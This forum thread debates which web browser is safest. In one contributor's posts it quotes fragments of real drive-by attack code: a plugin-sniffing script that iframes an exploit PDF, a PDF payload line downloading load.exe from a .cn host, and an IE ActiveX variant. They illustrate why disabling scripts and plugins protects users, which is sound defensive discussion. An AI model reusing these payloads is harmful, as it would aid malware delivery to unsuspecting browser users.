Your opinion on the safest browser?

But Firefox has the best update manager, even ordinary Joe will get all updates

 

IE, Chrome, Opera, and Safari all come with automatic updates, or at the very least notifications.

 

Firefox is reasonably secure, in more or less the same way that IE6 is secure if you keep up with all the security patches. All I'm saying is that Firefox is seriously lagging behind its competitors in this area.

 

Why is that..?

 

Try reading the thread.

 

Look at this

 

The safest browser is a browser that is in a Sandbox. Period.

So why not just use a browser that you like the most?

 

Google is beta so its a constant process, in case of FF, there were many serious unpatched flaws which needed rectification. Opera has never had a serious hole left open for long, all one needs to do is check Opera's record at Secunia.

 

May be, but: The update process in Safari & Opera is bad because there is no automatic update Ordinary Joe will rarely get an update as you can read in the article ...

 

I agree with a number of posters, in that the safest browser is a 'Sandboxed' one.

However, saying that, I use FF (always updated), along with Adblock Plus and NoScript, combined with the MVPS Hosts file (always updated - I utilize HostsXpert), and have never encountered an issue.

Sometimes I might tinker with Sandboxie, if I feel the need to, and very rarely use IE8.

I may even have a look at Opera.

 

You can make a distinction between security (how vulnerable you are if attacked) and safety (how likely you are to be attacked).

Opinions​

• Someone identified as "DCT" who wrote malware in Russia and was interviewed 2 years ago, suggested people use Opera with scripts and plug-ins disabled in order not to be a victim of an attack with his group's software (MPack).
  
  
• Charlie Miller (who worked at the NSA for 5 years, co-author of The Mac Hackers Handbook, and a winner at this year's Pwn2Own) stated in an interview in March that given all the browers (Opera wan't included) on all the platforms (Linux also wasn't included) at Pwn2Own this year, he felt the hardest target was Firefox on Windows Vista/7.
  
  
• Dino A. Dai Zovi (who worked on the Sandia National Laboratories IDART in college, co-authored The Mac Hackers Handbook, and a winner at Pwn2Own 3 years ago) recommended in an interview last month that:
  But he also stated that he personally used Safari for his everyday browsing (for the UI), Firefox on financial sites (for more security), and Chrome running on Vista x64 within a VMWare Fusion VM for secure development - on separate Macs.

 

Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.

Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.

So there!

----
rich

 

What a mature, intellectual post, I think not.

Engage brain before operating fingers.

If you can't post a sensible, constructive response, then don't bother posting at all.

 

What can be more constructive than testing exploits? I gave one example already in a previous post.

----
rich

 

You should heed your own words my friend. Rmus' post was probably the only intelligent one yet.

 

Whenever there is new version of Opera, an update is offered. I prefer it that way as I might not want my browser to be patched. Its about choice and I would hate it being done behind my back.

 

Exactly! Then again if we knew how malware worked then we wouldn't have anything to argue about. From reading your posts it looks like the browsers are safe and it's the user or plug ins that are being "exploited".

Do you know of any real examples of a browser vulnerability (old or new) in the wild?

 

The following is called intelligent??

'...Talk, talk talk...yak,yak, yak... contests...lists...bull-oney --go to a malicious URL and test (stupid, to The extreme) . That's the only way to verify an opinion. I try them all, and none are successful...'

Besides, pretty pictures are one thing................... Proof is another...............

 

Rich,

Unfortunately, we all can't spend our time testing software or studying computer security to the degree necessary. Some of us need to know the opinions and experiences of professionals and others (which therefore aren't completely irrelevant) in order to help us form our own conclusions, such as your own valuable experiences testing real malware.

But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'?

They have light-years more experience testing real malware than me, and maybe even more experience than you.

 

Are their claims reproducible? Verifiable? Can they be tested?

Those men are not scientists speaking about the results of scientific, controlled testing. At best they're offering their opinion. It would be silly to reduce computer security to the level of religion, where the words of the so-called "authorities" are unquestioningly taken as gospel.

 

I prefer the phrase, "exploit in the wild" because there are many reported vulnerabilities that never become exploits in the wild. It's just my way of distinguishing what is in the wild and what is not. It's not that I don't pay attention to vulnerabilities, I just don't get too excited about them...

I'm not aware of any exploits in the wild that target code in Opera or Firefox. I can't speak for other browsers. But there are numerous exploits that target IE, and an interesting tactic in use now is to serve up the same trojan in a webpage-based attack using different exploits depending on the user's Browser.

One recently served up a PDF exploit targeting the Acrobat Plugin for Opera and Firefox:

Code:

<[COLOR="DarkRed"][B]script[/B][/COLOR]
name = navigator.[B][COLOR="DarkRed"]plugins[/COLOR][/B][i].name;

if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
{
		
document.write ('<i frame src="[COLOR="DarkRed"][B]pdf.pdf[/B][/COLOR]"></i frame>');
</script

You can see that with scripting disabled in the Browser, the exploit fails, since the code contains the script tag. To show the pay load trojan, I let the exploit run and we can see the code in the PDF file that calls out to download the trojan, load.exe

Code:

URLMON.DLL. URL DownloadToFileA.
http://XXXXXX.cn/[B][COLOR="DarkRed"]load[/COLOR][/B].php?id=4..

​

You can see by the firewall alert and the program that attempts the download that this is an exploit against the Acrobat Plugin and not the browser. Nonetheless, disabling scripting in the browser provides the first layer of protection. Another layer of protection in the browser is to disable the Acrobat Plugins. This, of course, applies to all browsers!

Connecting to the same page with IE, a different exploit targeting IE attempts to download the same trojan:

​

A quick check at Virus Total showed the two load.exe files to be the same.

I didn't look at the source code, so am not sure which specific exploit against IE this was. Some old ones still in use are:

MS08-041 - ActiveX Control for the Snapshot Viewer Exploit
MS06-014 - Microsoft Data Access Components (MDAC) Function Exploit

The dates (2008, 2006) are when they were patched! That these continue to be used with success says something...

New ones target IE7 but I don't have that version, so I haven't tested. But they are all the same: some weakness in the code (if unpatched) allows for remote code execution, usually to download a trojan.

Another site had 2 different codes for PDF exploits, according to the browser. In addition to the code above for Acrobat Plugins in Opera and Firefox, this was served up to the IE browser:

Code:

<script>
function pdfswf()
{
obj = [COLOR="DarkRed"][B]new ActiveXObject[/B][/COLOR](PDF[i]);
document.write ('<i frame src="http://sitesupports.cn/cache/[COLOR="DarkRed"][B]readme.pdf[/B][/COLOR]"></i frame>');

You may recognize the reference to ActiveX which will trigger the Acrobat plugin for IE.

I know that it's cool to criticize the IE browser, but right off hand I can think of 3 people who have used IE since at least IE3 or IE4 with no problems. You just have to keep up with things and learn how to properly configure it. They aren't bothered by all of the hoopla against IE. I can imagine at least one retorting to the criticisms,

"Just because his shoes are too tight, why should my feet hurt?"

----
rich

 

The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts. Unfortunately, when it comes to browsers, I don't find objective testing of real exploits out there. If there were, you wouldn't find people nitpicking between Firefox and Opera, for example, because both browsers provide a secure and safe experience on the web when configured properly.

That's why I do my own tests and advise people I help accordingly.

----
rich

 

----
'...because both browsers provide a secure and safe experience on the web when configured properly...

Now, that's a much nicer approach. Exactly my point. Same as IE8, when it's properly configured, he says dubiously.

 

More on this, as two instances come to mind.

One, during the rash of autorun.inf exploits a while back. A respected security analyst was interviewed -- his company had identified a new trojan that was being used in USB attacks. He stated that the exploit could re-enable Autorun if it were disabled on the user's machine. I contacted him about this neat trick: how could the exploit run to renable autorun if autorun were disabled, and would he share his analysis, being curious as to how this could take place. He declined, saying that it was proprietory. Finally after several more emails, he said that he had been misquoted by the interviewer. Meanwhile, another AV vendor posted a complete analysis, proving his statement to be incorrect, and it was easily verifiable with a simple test.

Another example, upon the return of the MBR rootkit late last year, Sinowal/Mebroot. A well-respected Security Newsletter editor made this astounding statement:

I wrote and asked if he were aware that f-secure had listed all of the web-based exploits in use, and that they were just tried and true drive by attacks, easily blocked by proper protection.

His statement above followed these comments, which explain his reasoning:

Mired in the old concept that AV is the only protection, you can see his outmoded thinking.

By the way, he also neglected to mention that all of the attacks were against unpatched versions of IE.

So much for (some) security professionals.

You need to be alert and discriminating in what you read.

----
rich

 

I understand that IE8 with Vista has many new security features.

----
rich